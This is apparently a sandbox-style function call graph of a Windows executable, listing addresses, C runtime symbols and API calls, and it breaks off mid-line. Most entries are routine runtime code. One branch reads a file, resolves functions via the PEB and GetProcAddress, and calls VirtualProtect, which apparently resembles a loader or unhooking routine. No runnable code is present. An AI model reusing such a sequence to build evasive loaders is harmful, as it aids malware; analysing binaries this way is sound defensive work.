331be5 __strnicoll GetLastError SetLastError 17229->17233 17231 32d5e0 __strnicoll 16 API calls 17230->17231 17231->17229 17232->17227 17234 331bb4 17233->17234 17234->17232 17235 3319ec __Getctype 11 API calls 17234->17235 17236 331be4 17235->17236 17237->17220 17239 32719a IsProcessorFeaturePresent 17238->17239 17240 327199 17238->17240 17242 32958d 17239->17242 17240->17175 17245 329673 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17242->17245 17244 329670 17244->17175 17245->17244 17279 32c7aa 17246->17279 17249 3374a0 17251 3374a5 GetACP 17249->17251 17252 3374b7 17249->17252 17250 33748e GetOEMCP 17250->17252 17251->17252 17252->16939 17253 3356b1 17252->17253 17254 3356ef 17253->17254 17259 3356bf __strnicoll 17253->17259 17256 3312d4 __strnicoll 14 API calls 17254->17256 17255 3356da RtlAllocateHeap 17257 3356ed 17255->17257 17255->17259 17256->17257 17257->16935 17257->16936 17258 32f46b std::ios_base::_Init 2 API calls 17258->17259 17259->17254 17259->17255 17259->17258 17261 33746d 41 API calls 17260->17261 17262 337288 17261->17262 17264 3372c5 IsValidCodePage 17262->17264 17269 33738d 17262->17269 17270 3372e0 std::bad_exception::bad_exception 17262->17270 17263 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17265 33746b 17263->17265 17266 3372d7 17264->17266 17264->17269 17265->16941 17265->16946 17267 337300 GetCPInfo 17266->17267 17266->17270 17267->17269 17267->17270 17269->17263 17319 3377f7 17270->17319 17272 3379a8 ___scrt_is_nonwritable_in_current_image 17271->17272 17402 331cd1 EnterCriticalSection 17272->17402 17274 3379b2 17403 337736 17274->17403 17280 32c7c8 17279->17280 17281 32c7c1 17279->17281 17280->17281 17282 33590a _unexpected 39 API calls 17280->17282 17281->17249 17281->17250 17283 32c7e9 17282->17283 17287 335eee 17283->17287 17288 335f01 17287->17288 17289 32c7ff 17287->17289 17288->17289 17295 33a015 17288->17295 17291 335f1b 17289->17291 17292 335f43 17291->17292 17293 335f2e 17291->17293 17292->17281 17293->17292 17316 337202 17293->17316 17296 33a021 ___scrt_is_nonwritable_in_current_image 17295->17296 17297 33590a _unexpected 39 API calls 17296->17297 17298 33a02a 17297->17298 17299 33a070 17298->17299 17308 331cd1 EnterCriticalSection 17298->17308 17299->17289 17301 33a048 17309 33a096 17301->17309 17306 331f43 CallUnexpected 39 API calls 17307 33a095 17306->17307 17308->17301 17310 33a059 17309->17310 17311 33a0a4 __Getctype 17309->17311 17313 33a075 17310->17313 17311->17310 17312 339e4a __Getctype 14 API calls 17311->17312 17312->17310 17314 331ce8 std::_Lockit::~_Lockit LeaveCriticalSection 17313->17314 17315 33a06c 17314->17315 17315->17299 17315->17306 17317 33590a _unexpected 39 API calls 17316->17317 17318 337207 17317->17318 17318->17292 17320 33781f GetCPInfo 17319->17320 17329 3378e8 17319->17329 17326 337837 17320->17326 17320->17329 17322 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17324 33799a 17322->17324 17324->17269 17330 336ca0 17326->17330 17328 336da1 44 API calls 17328->17329 17329->17322 17331 32c7aa __strnicoll 39 API calls 17330->17331 17332 336cc0 17331->17332 17350 3356ff 17332->17350 17334 336d7c 17337 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17334->17337 17335 336d74 17353 329ec7 17335->17353 17336 336ced 17336->17334 17336->17335 17339 3356b1 __strnicoll 15 API calls 17336->17339 17341 336d12 __alloca_probe_16 std::bad_exception::bad_exception 17336->17341 17340 336d9f 17337->17340 17339->17341 17345 336da1 17340->17345 17341->17335 17342 3356ff __strnicoll MultiByteToWideChar 17341->17342 17343 336d5b 17342->17343 17343->17335 17344 336d62 GetStringTypeW 17343->17344 17344->17335 17346 32c7aa __strnicoll 39 API calls 17345->17346 17347 336db4 17346->17347 17362 336dea 17347->17362 17357 335729 17350->17357 17354 329ee2 17353->17354 17355 329ed1 17353->17355 17354->17334 17355->17354 17359 332a1e 17355->17359 17358 33571b MultiByteToWideChar 17357->17358 17358->17336 17360 335677 ___free_lconv_mon 14 API calls 17359->17360 17361 332a36 17360->17361 17361->17354 17363 336e05 __strnicoll 17362->17363 17364 3356ff __strnicoll MultiByteToWideChar 17363->17364 17366 336e49 17364->17366 17365 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17367 336dd5 17365->17367 17368 3356b1 __strnicoll 15 API calls 17366->17368 17370 336e6f __alloca_probe_16 17366->17370 17371 336fc4 17366->17371 17382 336f17 17366->17382 17367->17328 17368->17370 17369 329ec7 __freea 14 API calls 17369->17371 17372 3356ff __strnicoll MultiByteToWideChar 17370->17372 17370->17382 17371->17365 17373 336eb8 17372->17373 17373->17382 17390 3364b3 17373->17390 17382->17369 17391 336822 std::_Locinfo::_Locinfo_dtor 5 API calls 17390->17391 17392 3364be 17391->17392 17393 3364c4 LCMapStringEx 17392->17393 17394 3364eb 17392->17394 17402->17274 17413 33337b 17403->17413 17405 337758 17406 33337b 29 API calls 17405->17406 17407 337777 17406->17407 17408 33779e 17407->17408 17409 335677 ___free_lconv_mon 14 API calls 17407->17409 17410 3379dd 17408->17410 17409->17408 17427 331ce8 LeaveCriticalSection 17410->17427 17412 3379cb 17412->16947 17414 33338c 17413->17414 17418 333388 _Yarn 17413->17418 17415 333393 17414->17415 17419 3333a6 std::bad_exception::bad_exception 17414->17419 17416 3312d4 __strnicoll 14 API calls 17415->17416 17417 333398 17416->17417 17420 3319bf __strnicoll 29 API calls 17417->17420 17418->17405 17419->17418 17421 3333d4 17419->17421 17422 3333dd 17419->17422 17420->17418 17423 3312d4 __strnicoll 14 API calls 17421->17423 17422->17418 17424 3312d4 __strnicoll 14 API calls 17422->17424 17425 3333d9 17423->17425 17424->17425 17426 3319bf __strnicoll 29 API calls 17425->17426 17426->17418 17427->17412 17429 335308 17428->17429 17430 3352fa 17428->17430 17431 3312d4 __strnicoll 14 API calls 17429->17431 17430->17429 17435 335320 17430->17435 17432 335310 17431->17432 17433 3319bf __strnicoll 29 API calls 17432->17433 17434 33531a 17433->17434 17434->16894 17435->17434 17436 3312d4 __strnicoll 14 API calls 17435->17436 17436->17432 17441 3317b3 17437->17441 17442 3317d0 17437->17442 17438 3317ca 17439 335677 ___free_lconv_mon 14 API calls 17438->17439 17439->17442 17440 335677 ___free_lconv_mon 14 API calls 17440->17441 17441->17438 17441->17440 17442->16892 17444 3319f8 17443->17444 17445 331a20 std::locale::_Setgloballocale 8 API calls 17444->17445 17446 331a0d GetCurrentProcess TerminateProcess 17445->17446 17446->16899 17448 33ca10 17447->17448 17449 33ca21 17448->17449 17453 33ca34 ___from_strstr_to_strchr 17448->17453 17450 3312d4 __strnicoll 14 API calls 17449->17450 17451 33ca26 17450->17451 17451->16844 17452 33cc4b 17454 3312d4 __strnicoll 14 API calls 17452->17454 17453->17452 17455 33ca54 17453->17455 17456 33cc50 17454->17456 17510 33cc70 17455->17510 17458 335677 ___free_lconv_mon 14 API calls 17456->17458 17458->17451 17460 33ca98 17497 33ca84 17460->17497 17514 33cc8a 17460->17514 17461 33ca9a 17465 3369b4 __strnicoll 14 API calls 17461->17465 17461->17497 17462 33ca76 17469 33ca93 17462->17469 17470 33ca7f 17462->17470 17466 33caa8 17465->17466 17468 335677 ___free_lconv_mon 14 API calls 17466->17468 17467 335677 ___free_lconv_mon 14 API calls 17467->17451 17472 33cab3 17468->17472 17474 33cc70 39 API calls 17469->17474 17473 3312d4 __strnicoll 14 API calls 17470->17473 17471 33cb0d 17475 335677 ___free_lconv_mon 14 API calls 17471->17475 17472->17460 17479 3369b4 __strnicoll 14 API calls 17472->17479 17472->17497 17473->17497 17474->17460 17481 33cb15 17475->17481 17476 33cb58 17477 33c025 std::ios_base::_Init 32 API calls 17476->17477 17476->17497 17478 33cb86 17477->17478 17480 335677 ___free_lconv_mon 14 API calls 17478->17480 17482 33cacf 17479->17482 17487 33cb42 17480->17487 17481->17487 17518 33c025 17481->17518 17486 335677 ___free_lconv_mon 14 API calls 17482->17486 17483 33cc40 17484 335677 ___free_lconv_mon 14 API calls 17483->17484 17484->17451 17486->17460 17487->17483 17487->17487 17490 3369b4 __strnicoll 14 API calls 17487->17490 17487->17497 17488 33cb39 17489 335677 ___free_lconv_mon 14 API calls 17488->17489 17489->17487 17491 33cbd1 17490->17491 17492 33cbe1 17491->17492 17493 33cbd9 17491->17493 17495 3352ec ___std_exception_copy 29 API calls 17492->17495 17494 335677 ___free_lconv_mon 14 API calls 17493->17494 17494->17497 17496 33cbed 17495->17496 17498 33cc65 17496->17498 17499 33cbf4 17496->17499 17497->17467 17501 3319ec __Getctype 11 API calls 17498->17501 17527 3438ec 17499->17527 17503 33cc6f 17501->17503 17504 33cc1b 17506 3312d4 __strnicoll 14 API calls 17504->17506 17505 33cc3a 17507 335677 ___free_lconv_mon 14 API calls 17505->17507 17508 33cc20 17506->17508 17507->17483 17509 335677 ___free_lconv_mon 14 API calls 17508->17509 17509->17497 17511 33ca5f 17510->17511 17512 33cc7d 17510->17512 17511->17460 17511->17461 17511->17462 17542 33ccdf 17512->17542 17515 33cca0 17514->17515 17517 33cafd 17514->17517 17515->17517 17557 3437fb 17515->17557 17517->17471 17517->17476 17519 33c032 17518->17519 17520 33c04d 17518->17520 17519->17520 17521 33c03e 17519->17521 17524 33c05c 17520->17524 17657 342784 17520->17657 17523 3312d4 __strnicoll 14 API calls 17521->17523 17526 33c043 std::bad_exception::bad_exception 17523->17526 17664 33efc5 17524->17664 17526->17488 17676 336975 17527->17676 17532 34395f 17533 34396b 17532->17533 17535 335677 ___free_lconv_mon 14 API calls 17532->17535 17536 33cc15 17533->17536 17538 335677 ___free_lconv_mon 14 API calls 17533->17538 17534 336975 39 API calls 17537 34393c 17534->17537 17535->17533 17536->17504 17536->17505 17539 32c8a4 17 API calls 17537->17539 17538->17536 17540 343949 17539->17540 17540->17532 17541 343953 SetEnvironmentVariableW 17540->17541 17541->17532 17543 33ccf2 17542->17543 17550 33cced 17542->17550 17544 3369b4 __strnicoll 14 API calls 17543->17544 17555 33cd0f 17544->17555 17545 33cd7d 17547 331f43 CallUnexpected 39 API calls 17545->17547 17546 33cd6c 17548 335677 ___free_lconv_mon 14 API calls 17546->17548 17549 33cd82 17547->17549 17548->17550 17551 3319ec __Getctype 11 API calls 17549->17551 17550->17511 17552 33cd8e 17551->17552 17553 3369b4 __strnicoll 14 API calls 17553->17555 17554 335677 ___free_lconv_mon 14 API calls 17554->17555 17555->17545 17555->17546 17555->17549 17555->17553 17555->17554 17556 3352ec ___std_exception_copy 29 API calls 17555->17556 17556->17555 17558 34380f 17557->17558 17559 343809 17557->17559 17575 343824 17558->17575 17561 344023 17559->17561 17562 34406b 17559->17562 17564 344029 17561->17564 17567 344046 17561->17567 17595 344081 17562->17595 17566 3312d4 __strnicoll 14 API calls 17564->17566 17568 34402e 17566->17568 17569 344064 17567->17569 17571 3312d4 __strnicoll 14 API calls 17567->17571 17570 3319bf __strnicoll 29 API calls 17568->17570 17569->17515 17574 344039 17570->17574 17572 344055 17571->17572 17573 3319bf __strnicoll 29 API calls 17572->17573 17573->17574 17574->17515 17576 32c7aa __strnicoll 39 API calls 17575->17576 17577 34383a 17576->17577 17578 343856 17577->17578 17579 34386d 17577->17579 17591 34381f 17577->17591 17580 3312d4 __strnicoll 14 API calls 17578->17580 17581 343876 17579->17581 17582 343888 17579->17582 17583 34385b 17580->17583 17584 3312d4 __strnicoll 14 API calls 17581->17584 17585 343895 17582->17585 17586 3438a8 17582->17586 17587 3319bf __strnicoll 29 API calls 17583->17587 17588 34387b 17584->17588 17589 344081 __strnicoll 39 API calls 17585->17589 17613 34414c 17586->17613 17587->17591 17592 3319bf __strnicoll 29 API calls 17588->17592 17589->17591 17591->17515 17592->17591 17594 3312d4 __strnicoll 14 API calls 17594->17591 17596 344091 17595->17596 17597 3440ab 17595->17597 17598 3312d4 __strnicoll 14 API calls 17596->17598 17599 3440b3 17597->17599 17600 3440ca 17597->17600 17601 344096 17598->17601 17602 3312d4 __strnicoll 14 API calls 17599->17602 17603 3440d6 17600->17603 17604 3440ed 17600->17604 17605 3319bf __strnicoll 29 API calls 17601->17605 17606 3440b8 17602->17606 17607 3312d4 __strnicoll 14 API calls 17603->17607 17609 32c7aa __strnicoll 39 API calls 17604->17609 17612 3440a1 17604->17612 17605->17612 17610 3319bf __strnicoll 29 API calls 17606->17610 17608 3440db 17607->17608 17611 3319bf __strnicoll 29 API calls 17608->17611 17609->17612 17610->17612 17611->17612 17612->17574 17614 32c7aa __strnicoll 39 API calls 17613->17614 17615 34415f 17614->17615 17618 344192 17615->17618 17624 3441c6 __strnicoll 17618->17624 17619 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17620 3438be 17619->17620 17620->17591 17620->17594 17621 344246 17623 3356ff __strnicoll MultiByteToWideChar 17621->17623 17630 34424a 17621->17630 17622 34442a 17627 3442cc 17623->17627 17624->17621 17624->17622 17625 344233 GetCPInfo 17624->17625 17624->17630 17625->17621 17625->17630 17626 34441e 17628 329ec7 __freea 14 API calls 17626->17628 17627->17626 17629 3356b1 __strnicoll 15 API calls 17627->17629 17627->17630 17631 3442f3 __alloca_probe_16 17627->17631 17628->17630 17629->17631 17630->17619 17630->17622 17631->17626 17632 3356ff __strnicoll MultiByteToWideChar 17631->17632 17633 34433f 17632->17633 17633->17626 17634 3356ff __strnicoll MultiByteToWideChar 17633->17634 17635 34435b 17634->17635 17635->17626 17636 344369 17635->17636 17637 3443cc 17636->17637 17639 3356b1 __strnicoll 15 API calls 17636->17639 17642 344382 __alloca_probe_16 17636->17642 17638 329ec7 __freea 14 API calls 17637->17638 17640 3443d2 17638->17640 17639->17642 17641 329ec7 __freea 14 API calls 17640->17641 17641->17630 17642->17637 17643 3356ff __strnicoll MultiByteToWideChar 17642->17643 17644 3443c5 17643->17644 17644->17637 17645 3443ee 17644->17645 17651 336205 17645->17651 17648 329ec7 __freea 14 API calls 17649 34440e 17648->17649 17650 329ec7 __freea 14 API calls 17649->17650 17650->17630 17652 33676c std::_Locinfo::_Locinfo_dtor 5 API calls 17651->17652 17653 336210 17652->17653 17654 33654f __strnicoll 5 API calls 17653->17654 17656 336216 17653->17656 17655 336256 CompareStringW 17654->17655 17655->17656 17656->17648 17658 3427a4 HeapSize 17657->17658 17659 34278f 17657->17659 17658->17524 17660 3312d4 __strnicoll 14 API calls 17659->17660 17661 342794 17660->17661 17662 3319bf __strnicoll 29 API calls 17661->17662 17663 34279f 17662->17663 17663->17524 17665 33efd2 17664->17665 17666 33efdd 17664->17666 17667 3356b1 __strnicoll 15 API calls 17665->17667 17668 33efe5 17666->17668 17674 33efee __strnicoll 17666->17674 17672 33efda 17667->17672 17669 335677 ___free_lconv_mon 14 API calls 17668->17669 17669->17672 17670 33eff3 17673 3312d4 __strnicoll 14 API calls 17670->17673 17671 33f018 HeapReAlloc 17671->17672 17671->17674 17672->17526 17673->17672 17674->17670 17674->17671 17675 32f46b std::ios_base::_Init 2 API calls 17674->17675 17675->17674 17677 32c7aa __strnicoll 39 API calls 17676->17677 17679 336987 17677->17679 17678 336999 17681 32c8a4 17678->17681 17679->17678 17684 3361e6 17679->17684 17690 32c8fc 17681->17690 17687 336752 17684->17687 17688 3366cd std::_Locinfo::_Locinfo_dtor 5 API calls 17687->17688 17689 3361ee 17688->17689 17689->17678 17691 32c924 17690->17691 17692 32c90a 17690->17692 17694 32c94a 17691->17694 17695 32c92b 17691->17695 17708 32c88a 17692->17708 17697 3356ff __strnicoll MultiByteToWideChar 17694->17697 17696 32c8bc 17695->17696 17712 32c84b 17695->17712 17696->17532 17696->17534 17699 32c959 17697->17699 17700 32c960 GetLastError 17699->17700 17703 32c84b 15 API calls 17699->17703 17706 32c986 17699->17706 17717 3312fa 17700->17717 17703->17706 17704 3356ff __strnicoll MultiByteToWideChar 17707 32c99d 17704->17707 17705 3312d4 __strnicoll 14 API calls 17705->17696 17706->17696 17706->17704 17707->17696 17707->17700 17709 32c89d 17708->17709 17710 32c895 17708->17710 17709->17696 17711 335677 ___free_lconv_mon 14 API calls 17710->17711 17711->17709 17713 32c88a 14 API calls 17712->17713 17714 32c859 17713->17714 17722 32c82c 17714->17722 17725 3312e7 17717->17725 17719 331305 __dosmaperr 17720 3312d4 __strnicoll 14 API calls 17719->17720 17721 32c96c 17720->17721 17721->17705 17723 3356b1 __strnicoll 15 API calls 17722->17723 17724 32c839 17723->17724 17724->17696 17726 335a5b __strnicoll 14 API calls 17725->17726 17727 3312ec 17726->17727 17727->17719 17731 322010 GetModuleHandleA GetModuleFileNameW 17728->17731 17738 333fda 17731->17738 17733 322081 17742 321f00 17733->17742 17736 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17737 322099 17736->17737 17737->16714 17739 333fed _Fputc 17738->17739 17751 33404f 17739->17751 17741 333fff _Fputc 17741->17733 17793 321ba0 GetPEB 17742->17793 17744 321f1f 17794 321c10 GetProcAddress 17744->17794 17746 321f39 17747 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17746->17747 17749 321ffb 17747->17749 17749->17736 17750 321f31 17750->17746 17807 321db0 17750->17807 17752 33407f 17751->17752 17753 33408e 17752->17753 17754 3340ac 17752->17754 17765 334083 17752->17765 17755 331b68 __strnicoll 29 API calls 17753->17755 17756 3340b9 17754->17756 17775 32d580 17754->17775 17755->17765 17759 3340d3 17756->17759 17760 3340f1 17756->17760 17757 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17764 3342f4 17757->17764 17781 33f42b 17759->17781 17762 334281 17760->17762 17763 334105 17760->17763 17762->17765 17766 3357c1 _Fputc WideCharToMultiByte 17762->17766 17763->17765 17767 33419f 17763->17767 17771 334149 17763->17771 17764->17741 17765->17757 17766->17765 17768 3357c1 _Fputc WideCharToMultiByte 17767->17768 17770 3341b2 17768->17770 17769 3357c1 _Fputc WideCharToMultiByte 17769->17765 17770->17765 17772 3341cb GetLastError 17770->17772 17771->17769 17772->17765 17773 3341da 17772->17773 17773->17765 17774 3357c1 _Fputc WideCharToMultiByte 17773->17774 17774->17773 17776 32d590 17775->17776 17785 335f48 17776->17785 17784 33f462 _Yarn std::_Locinfo::_Locinfo_dtor 17781->17784 17782 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17783 33f538 17782->17783 17783->17765 17784->17782 17786 32d5ad 17785->17786 17787 335f5f 17785->17787 17789 335f79 17786->17789 17787->17786 17788 33a015 __Getctype 39 API calls 17787->17788 17788->17786 17790 335f90 17789->17790 17791 32d5ba 17789->17791 17790->17791 17792 337202 __strnicoll 39 API calls 17790->17792 17791->17756 17792->17791 17793->17744 17795 321c59 CreateFileA 17794->17795 17796 321cb3 GetFileSize 17795->17796 17797 321caa 17795->17797 17798 321cf1 17796->17798 17799 321cd9 CloseHandle 17796->17799 17800 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17797->17800 17801 321cfc ReadFile 17798->17801 17799->17797 17802 321d98 17800->17802 17803 321d70 CloseHandle 17801->17803 17804 321d3c 17801->17804 17802->17750 17803->17797 17805 321d58 CloseHandle 17804->17805 17806 321d4d 17804->17806 17805->17797 17806->17805 17819 321000 17807->17819 17810 321000 106 API calls 17811 321e5b GetProcAddress 17810->17811 17812 321e84 VirtualProtect 17811->17812 17814 321ed1 17812->17814 17815 321edc 17812->17815 17830 321bd0 17814->17830 17817 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17815->17817 17818 321eeb 17817->17818 17818->17746 17820 321056 17819->17820 17834 321440 17820->17834 17822 321167 ___std_exception_copy 17823 3213c7 17822->17823 17829 332a1e ___vcrt_freefls@4 14 API calls 17822->17829 17838 321490 17822->17838 17841 3214c0 17822->17841 17857 321af0 17822->17857 17863 321b80 17823->17863 17829->17822 17831 321bfa 17830->17831 17832 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17831->17832 17833 321c04 17832->17833 17833->17815 17835 321466 std::ios_base::_Init 17834->17835 17836 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17835->17836 17837 321487 17836->17837 17837->17822 17866 3223d0 17838->17866 17840 3214aa 17840->17822 17843 321510 _strlen 17841->17843 17913 323050 17843->17913 17844 3215b1 17850 3215c4 17844->17850 17917 323180 17844->17917 17849 3218ef 17849->17822 17939 3235b0 17850->17939 17851 323430 70 API calls 17853 321601 std::ios_base::_Ios_base_dtor 17851->17853 17853->17851 17856 3216bc 17853->17856 17854 321712 17854->17850 17856->17854 17934 323430 17856->17934 17858 321b20 _Fputc 17857->17858 18109 3220f0 17858->18109 17861 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17862 321b4e 17861->17862 17862->17822 18128 3221f0 17863->18128 17867 322418 17866->17867 17869 3223ff 17866->17869 17870 3224b0 17867->17870 17869->17840 17871 3224f3 std::ios_base::_Init 17870->17871 17889 322760 17871->17889 17874 32254a 17893 3227e0 17874->17893 17879 322579 std::ios_base::_Init 17880 322613 17879->17880 17881 3225e0 17879->17881 17883 3228b0 5 API calls 17880->17883 17907 3228b0 17881->17907 17884 32263a 17883->17884 17885 3228b0 5 API calls 17884->17885 17890 32277b std::ios_base::_Init 17889->17890 17891 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17890->17891 17892 322538 17891->17892 17892->17874 17904 3227c0 17892->17904 17894 3227f7 17893->17894 17895 322760 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17894->17895 17896 322561 17895->17896 17897 322860 17896->17897 17898 322ab0 30 API calls 17897->17898 17899 32287a 17898->17899 17899->17879 17905 327934 std::ios_base::_Init 30 API calls 17904->17905 17906 3227d2 17905->17906 17908 3228d7 std::ios_base::_Init 17907->17908 17909 322f90 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17908->17909 17910 322909 17909->17910 17915 323099 17913->17915 17914 3230b1 17914->17844 17915->17914 17947 3236e0 17915->17947 17955 3274a4 17917->17955 17921 3231d7 17933 323215 17921->17933 17976 323a80 17921->17976 17924 3232da 17924->17853 17926 32324b 17990 323be0 17926->17990 17969 3274d5 17933->17969 17940 3235d5 17939->17940 18090 324da0 17940->18090 17943 323600 17944 323614 17943->17944 17945 32362f 17944->17945 18105 326900 17944->18105 17945->17849 17948 323722 17947->17948 17949 3237d5 17948->17949 17950 323050 39 API calls 17948->17950 17949->17914 17953 32373d 17950->17953 17951 323750 17952 323600 39 API calls 17951->17952 17952->17949 17953->17951 17954 3235b0 39 API calls 17953->17954 17954->17951 17956 3274b3 17955->17956 17957 3274ba 17955->17957 18003 331cff 17956->18003 17960 3231c2 17957->17960 18008 329c18 EnterCriticalSection 17957->18008 17961 323950 17960->17961 17962 323972 17961->17962 17963 3239ae 17961->17963 17965 3274a4 std::_Lockit::_Lockit 7 API calls 17962->17965 17964 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17963->17964 17966 3239c0 17964->17966 17967 323983 17965->17967 17966->17921 17968 3274d5 std::_Lockit::~_Lockit 2 API calls 17967->17968 17968->17963 17970 331d0d 17969->17970 17971 3274df 17969->17971 18010 331ce8 LeaveCriticalSection 17970->18010 17975 3274f2 17971->17975 18009 329c26 LeaveCriticalSection 17971->18009 17974 331d14 17974->17924 17975->17924 17977 323abf 17976->17977 17985 323232 17976->17985 17977->17985 18011 327113 17977->18011 17979 323ad8 18022 323d10 17979->18022 17985->17926 17986 323bb0 17985->17986 17987 323bc8 17986->17987 18054 32a41c 17987->18054 17989 323bdd 17991 323c10 17990->17991 17992 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17991->17992 17993 323265 17992->17993 17994 327548 17993->17994 18004 3365cb std::_Locinfo::_Locinfo_dtor 5 API calls 18003->18004 18005 331d04 18004->18005 18006 331cd1 std::_Lockit::_Lockit EnterCriticalSection 18005->18006 18007 331d0b 18006->18007 18007->17960 18008->17960 18009->17975 18010->17974 18013 327118 ___std_exception_copy 18011->18013 18012 327132 18012->17979 18013->18012 18014 32f46b std::ios_base::_Init EnterCriticalSection LeaveCriticalSection 18013->18014 18015 327134 18013->18015 18014->18013 18016 32947e std::ios_base::_Init 18015->18016 18017 32713e Concurrency::cancel_current_task 18015->18017 18018 32a41c Concurrency::cancel_current_task RaiseException 18016->18018 18019 32a41c Concurrency::cancel_current_task RaiseException 18017->18019 18020 32949a 18018->18020 18021 327933 18019->18021 18023 3274a4 std::_Lockit::_Lockit 7 API calls 18022->18023 18055 32a436 18054->18055 18056 32a464 RaiseException 18054->18056 18055->18056 18056->17989 18093 324df0 18090->18093 18094 324e34 18093->18094 18095 324edc 18093->18095 18098 32a41c Concurrency::cancel_current_task RaiseException 18094->18098 18099 324e54 18094->18099 18096 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18095->18096 18097 3218d9 18096->18097 18097->17943 18098->18099 18100 324ef0 std::ios_base::_Init 38 API calls 18099->18100 18101 324eaf 18100->18101 18102 324f30 std::ios_base::_Init 30 API calls 18101->18102 18103 324ec4 18102->18103 18104 32a41c Concurrency::cancel_current_task RaiseException 18103->18104 18104->18095 18107 326942 18105->18107 18106 32694a 18106->17945 18107->18106 18108 3235b0 39 API calls 18107->18108 18108->18106 18110 322119 18109->18110 18113 32d348 18110->18113 18112 321b3b 18112->17861 18114 32d35c _Fputc 18113->18114 18115 32d37e 18114->18115 18117 32d3a5 18114->18117 18116 331b68 __strnicoll 29 API calls 18115->18116 18119 32d399 _Fputc 18116->18119 18120 32eafd 18117->18120 18119->18112 18121 32eb09 ___scrt_is_nonwritable_in_current_image 18120->18121 18122 32d0ff _Ungetc EnterCriticalSection 18121->18122 18123 32eb17 18122->18123 18124 32e4d2 70 API calls 18123->18124 18125 32eb24 18124->18125 18126 32eb4c LeaveCriticalSection 18125->18126 18127 32eb35 18126->18127 18127->18119 18130 322204 std::ios_base::_Init 18128->18130 18129 3213d2 18129->17810 18130->18129 18132 3222e0 18130->18132 18135 322310 18132->18135 18134 322304 18134->18129 18136 32233b std::ios_base::_Ios_base_dtor 18135->18136 18137 322329 18135->18137 18136->18134 18138 322360 std::ios_base::_Init 29 API calls 18137->18138 18138->18136 18140 32f2c3 18139->18140 18141 32f2b1 18139->18141 18151 32f41e 18140->18151 18142 3299e0 std::locale::_Setgloballocale GetModuleHandleW 18141->18142 18144 32f2b6 18142->18144 18144->18140 18166 32f1b8 GetModuleHandleExW 18144->18166 18146 32a28b 18146->16729 18152 32f42a ___scrt_is_nonwritable_in_current_image 18151->18152 18172 331cd1 EnterCriticalSection 18152->18172 18154 32f434 18173 32f31b 18154->18173 18156 32f441 18177 32f45f 18156->18177 18159 32f253 18202 32f23a 18159->18202 18161 32f25d 18162 32f271 18161->18162 18163 32f261 GetCurrentProcess TerminateProcess 18161->18163 18164 32f1b8 std::locale::_Setgloballocale 3 API calls 18162->18164 18163->18162 18165 32f279 ExitProcess 18164->18165 18167 32f1f7 GetProcAddress 18166->18167 18168 32f218 18166->18168 18167->18168 18171 32f20b 18167->18171 18169 32f227 18168->18169 18170 32f21e FreeLibrary 18168->18170 18169->18140 18170->18169 18171->18168 18172->18154 18175 32f327 ___scrt_is_nonwritable_in_current_image std::locale::_Setgloballocale 18173->18175 18174 32f38b std::locale::_Setgloballocale 18174->18156 18175->18174 18180 330fee 18175->18180 18201 331ce8 LeaveCriticalSection 18177->18201 18179 32f2fa 18179->18146 18179->18159 18181 330ffa __EH_prolog3 18180->18181 18184 331279 18181->18184 18183 331021 std::ios_base::_Init 18183->18174 18185 331285 ___scrt_is_nonwritable_in_current_image 18184->18185 18192 331cd1 EnterCriticalSection 18185->18192 18187 331293 18193 331144 18187->18193 18192->18187 18194 33115b 18193->18194 18196 331163 18193->18196 18197 3312c8 18194->18197 18195 335677 ___free_lconv_mon 14 API calls 18195->18194 18196->18194 18196->18195 18200 331ce8 LeaveCriticalSection 18197->18200 18199 3312b1 18199->18183 18200->18199 18201->18179 18205 338f0a 18202->18205 18204 32f23f std::locale::_Setgloballocale 18204->18161 18206 338f19 std::locale::_Setgloballocale 18205->18206 18207 338f26 18206->18207 18209 336580 18206->18209 18207->18204 18210 3366cd std::_Locinfo::_Locinfo_dtor 5 API calls 18209->18210 18211 33659c 18210->18211 18211->18207 18213 32d07d 18212->18213 18215 32d08f ___scrt_uninitialize_crt 18212->18215 18214 32d08b 18213->18214 18217 33213a 18213->18217 18214->16723 18215->16723 18220 332265 18217->18220 18223 33233e 18220->18223 18224 33234a ___scrt_is_nonwritable_in_current_image 18223->18224 18231 331cd1 EnterCriticalSection 18224->18231 18226 3323c0 18240 3323de 18226->18240 18227 332354 ___scrt_uninitialize_crt 18227->18226 18232 3322b2 18227->18232 18231->18227 18233 3322be ___scrt_is_nonwritable_in_current_image 18232->18233 18243 32d0ff EnterCriticalSection 18233->18243 18235 3322c8 ___scrt_uninitialize_crt 18236 332301 18235->18236 18244 332143 18235->18244 18255 332332 18236->18255 18356 331ce8 LeaveCriticalSection 18240->18356 18242 332141 18242->18214 18243->18235 18245 332158 _Fputc 18244->18245 18246 33216a 18245->18246 18247 33215f 18245->18247 18258 3321a8 18246->18258 18248 332265 ___scrt_uninitialize_crt 68 API calls 18247->18248 18252 332165 _Fputc 18248->18252 18252->18236 18355 32d113 LeaveCriticalSection 18255->18355 18257 332320 18257->18227 18259 3321c1 18258->18259 18263 332174 18258->18263 18260 